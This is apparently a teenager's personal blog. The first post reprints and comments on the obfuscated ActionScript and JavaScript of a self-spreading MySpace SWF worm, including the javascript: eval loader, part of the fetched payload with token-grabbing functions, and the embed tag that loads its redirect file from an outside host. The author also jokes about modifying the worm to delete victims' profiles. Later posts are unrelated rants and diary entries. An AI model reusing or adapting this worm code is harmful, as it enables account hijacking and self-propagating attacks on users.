Myspace SWF redirect exploit worm

SWEET! Everyone on Myspace is a tool. ALways were and will be moreso in the future. I am NOT apologizing for that. NO. Mysapce was actually started by spammers as a way to easily data mine. Anyway, that is not what i am going to talk about. Myspace just got hit by a nifty little .SWF flash redirect exploit worm. **Note. I didn't make it. "darn"**

How the myspace SWF hack worked

First note: I DID NOT MAKE THE HACK. I simply downloaded the .swf's, decompiled them, looked at the actionscript, worked out what it did, found the Javascript that it uses, and tidied it up & commented it. I've probably got some bits wrong, feel free to contact me and I'll update this page

When you visited an already infected page, there was an SWF embedded ("redirect.swf") which contained the actionscript:

getURL("http://editprofile.myspace.com/index.cfm?fuseaction=blog.view&friend
ID=93634373
&blogID=144877075", "_self");

Which is pretty self explanatory - it opened the blog URL which you got redirected to.

On the blog url which you got redirected to, there was another SWF embedded, called "retrievecookie.swf". This contained:

getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace
.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.
onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\'
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1)){var n=sc.indexOf(\'
\');if(n==-1)n=sc.indexOf(\'-XXX\');sc=sc.substring(0,n)+sc.substring(n+5,sc.length)
;};" + "eval(sc);}};" + "x.send(null);", "");

Which looks pretty obfuscated, however, when you space it out and add comments:

getURL("
javas\n\r
cript:
//this translates in the browser to: "javascript:"
//which myspace really should have blocked now.
var x = new ActiveXObject(\'Msxml2.XMLHTTP\');
// loads a new xmlHTTP object, sets it as var "x"
x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeC
omments&friendID=93634373\',true);
// This opens yet another blog post, at the URL above. The text of the URL is below
x.onreadystatechange = function()
// when the readystate of the xmlHTTP object changes:
{
if (x.readyState==4)
// once the state changes to complete (it goes from 0 to 4, iirc)
{
var pg = x.responseText;
// the code it got from the page
var sc = pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));
// loads into "sc" the contents of the response text from the place where
// the end of "BX-" (that's the +3) is first encountered up until it finds the start of
// "-EX", this is all the nasty JS.
while ( (sc.indexOf(\'
\')!=-1) || (sc.indexOf(\'-XXX\')!=-1) )
// while "sc" (the code) doesn't contain "
" or "-XXX" then:
{
var n=sc.indexOf(\'
\');
// n is the start of where it finds "
" in "sc"
if (n==-1)
n=sc.indexOf(\'-XXX\');
// if it cant find "
, then make n where it can find "-XXX"


// thist bit next was really quite clever, it manages to keep the > closing bracket for
// the embed tag, which it needs, and creates the embed tag by removing
// XXX's and leaving the final character!
sc = sc.substring(0,n)+sc.substring(n+5,sc.length);
// sc is now from the start, to n.
// then add on to sc the bit from n+5 to the end of sc,
// essentially, this cuts out the crap from the blog post it pull.
// the crap was in there in the first place to get past myspace's filters, I presume.
};
// this iterates through and removes the -XXX's from the blog post
" + "eval(sc);
// evaluate "sc" - this is what does it all.
} // end of readystate==4 "if"
}; //end of function
" //closing the quote from the SWF getURL() function
+
"
x.send(null);
// adds on sending "null" to the xmlHTTP object.
", ""
// no target, so it just executes.
);// end of SWF getURL function.

In essence, it pulls a blog post from somewhere else on myspace, and evaluates the code that it contains.

This is the post:

BX-var msg='-XXXX<-XXX XE-XXXXM-XXXXB-XXXXE-XXXXD-XXXX src="http://i105.photobucket.com/albums/m225/yrkblack/redirect.swf">BY SPAIRLKAIFS';function paramsToString(AV){ var N=new String(); var O=0; for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){ Q=Q.replace('+', '%2B')}while(Q.indexOf('&')!=-1){ Q=Q.replace('&amp;amp;amp;amp;amp;', '%26')}N+=P+'='+Q;O++ } return N};function getToken(page){ var start = page.indexOf('Mytoken='); token = page.substring(start+8, start+8+36); return token;};function getHashCode(page){ var start = page.indexOf

Props to Kinematic for Digging this (digg.com)

For those of you not "in" to reading code, I will explain what this basically means. When you are signed in to myspace and go to an infected profile, It infects your profile and sends you to a site with conspiracy theories about how bush knew about 9/11. (not that they aren't true)

Fixing this is going to be almost impossible except block all flash content. It will be interesting to see how they deal with this. This is only the first of many, many, Myspace explots. Just because of how it operates using URL's it is so easy to do things to people. You could edit this code so that everyone who saw your profile would add you as a friend, or compltley delete their profile... the possibilites are endless! (for other people, that is. heh, heh)

SCIENCE CAMP!

Yay! this time i get to go to science camp, where I will take the web design class. Hopefully when i come back my blog will no longer look like shitaki mushrooms. I may be able to post for the next ten days, but maybe not.
ANGER_OUT

My Hydrogen Bitch

No, she's not a bitch named hydrogen. This is about what goes through my head every time a politician says Hydrogen
EVERY Time I hear someone talk about alteratives to oil and say the word "hydrogen" I want to scream and rip their fucking head off.


Well, I don't know about ripping their fucking head off, but I certainly want to embarrass them by standing up and screaming at them, Then explain to everyone around me what a moron they are. Hydrogen can not be an energy source. There is NO abundant source of raw H2 anywhere on earth.


When I informed a member of our State House about this (At Boy's State) He looked my in the eye and said,(showing his superior knowledge of chemistry)

"Hydrogen is the most abundant element in the Universe." "...Well, we got a great big ocean made out of H2O..."

In case you didn't already know, electricity is gotten out of fuel cells by reacting hydrogen and oxygen across a membrane. In order to GET hydrogen in the first place, you either need to find the gas, which there is none, or get it from water using electrolysis (which takes electricity). There is no place where we can find hydrogen, wew either have to use energy to get it or waste energy taking it from hydrocarbons. Saying that we are going to rely upon hydrogen is like saying that we are going meet future energy needs with Batteries... they are trying to break the First and Second laws of Thermodynamics with this one.

So the next time someone says the magic word hyrdogen jump to action, Kicking and screaming and say "NO, NO, NO! You IDIOT!"

I KNOW I'M STILL ANGRY, ARE YOU?

Bolgsphere, Rejoice!

YES, YES, YES!... Everything that we could ever want to argue about right there. This could change the politics of America if everyone gets online and argues It out here.

It's time for politics to become more intelligent, and for democracy to really involve the people. Broadcast media tells you what to think and doesn't let you get involved. It's time to focus on what you need, what you care about, and the messages you want to get out.

Capaigns Wikia

Worl Cup Prediction

There have been revolutions to create socialism, democracy, and authoritarian dictatorship. But humankind has yet to fight a revolution to guarantee one of the most vital elements -- if not the most vital element -- of the good life. That is, a winning soccer team. If we were to take up arms for this reason, what kind of government would we want to install?...

Germany has a better eceonomy and more stable government than Italy, Portugal, and France... well, I'm sort of guessing except for France... their in the shitz.



Updated 7/06


um... nevermind what i said. Every Prediction I have made so far hyas been wrong! So, I am going to predict that France will win the world cup.

Go Italia!

Boy's State Debriefing

Okay everyone, gather ‘round, because you are only going to hear me say this once. I was wrong. Boy’s State was actually really fun. It was “conservative” but very good. Now I know what your thinking, but don’t worry, I haven’t been brainwashed.
This is how my average day went: get up at seven go right away to calisthenics (exercise)*, then take a shower and clean my room until we had to raise the flag, then eat breakfast, then clean dishes/grounds/bathrooms (we had a different duty everyday). Then we headed to a legislative session, where we did bills and resolutions and argued stuff out. The cool thing about this was, that once they passed both the house and the senate and was signed by the governor we elected there, they were taken by the Lt. Govenor to our State Capital where they might do something with them. After our Legislative session, we listened to a guest speaker, had lunch, washed dishes, legislative session, canoeing time, dinner, wash dishes, activity, sleep. We were very busy there.

About our guest speakers there, they were (almost) ALL very Conservative. Really. A lot of them were complete Jackasses too. I don’t want to get into it.

That is actually what I expected the whole camp to be like, but they actual way it’s was run was very non-partisan. We only prayed once or twice, so it wasn’t a strict every meal thing or any of that bullshit. Well, actually I should say that there was a prayer only once or twice, I just sort of stared at my feet while they rambled.

We had a really nice lake where we were at and played paddlepirates all the time, flipping canoes and getting resced by paddle boats.

The Lake. very nice place. Let's see, i don't think there is anything that i left out about boy's state except that it was really fun and you should go if you get the chance. Meeting people with different philosphys can really open up your horizons.

Know your enemy, and never underestimate them.